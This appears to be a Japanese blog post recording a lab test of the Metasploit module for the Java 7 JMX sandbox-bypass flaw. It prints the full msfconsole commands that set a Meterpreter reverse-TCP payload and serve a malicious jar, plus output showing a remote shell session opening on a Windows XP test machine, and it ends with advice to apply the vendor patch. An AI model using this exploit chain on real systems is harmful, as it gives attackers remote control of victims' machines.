内容としては Java のサンドボックスを回避され任意のコードが実行可能な脆弱性とのこと。
以下 JVN を参照。
http://jvn.jp/cert/JVNTA13-010A/index.html
この脆弱性を利用した metasploit のモジュールがリリースされていたので試してみる。
ソースコードと説明は以下の通り。
ソースコード。
http://www.exploit-db.com/exploits/24045/
metasploit の説明
http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_jmxbean
Rank = ExcellentRanking となっているので期待して試してみる。
クライアントサイドの環境としては Windows XP SP3 / IE8 / Java7u6 となる。
msf > use exploit/multi/browser/java_jre17_jmxbean msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(java_jre17_jmxbean) > set srvhost 192.168.1.1 srvhost => 192.168.1.1 msf exploit(java_jre17_jmxbean) > set srvport 80 srvport => 80 msf exploit(java_jre17_jmxbean) > set lhost 192.168.1.1 lhost => 192.168.1.1 msf exploit(java_jre17_jmxbean) > set lport 8080 lport => 8080 msf exploit(java_jre17_jmxbean) > set uripath java uripath => java msf exploit(java_jre17_jmxbean) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.1:8080 [*] Using URL: http://192.168.1.1:80/java [*] Server started. msf exploit(java_jre17_jmxbean) > msf exploit(java_jre17_jmxbean) > [*] 192.168.1.2 java_jre17_jmxbean - handling request for /java [*] 192.168.1.2 java_jre17_jmxbean - handling request for /java/ [*] 192.168.1.2 java_jre17_jmxbean - handling request for /java/YDtWsbMD.jar [*] 192.168.1.2 java_jre17_jmxbean - handling request for /java/YDtWsbMD.jar [*] Sending stage (30216 bytes) to 192.168.1.2 [*] Meterpreter session 1 opened (192.168.1.1:8080 -> 192.168.1.2:1059) at 2013-01-15 21:20:20 +0900 msf exploit(java_jre17_jmxbean) > show sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java test @ test 192.168.1.1:8080 -> 192.168.1.2:1059 (192.168.1.2)
成功した。
なお、Java6u15 が手元にあったので試しにそちらを試してみたところ失敗した。
Java7 のみの脆弱性なのかもしれないが、どちらにしても1月15日に修正版がりりーすされているので、そちらを適用するのがいい。
0 件のコメント:
コメントを投稿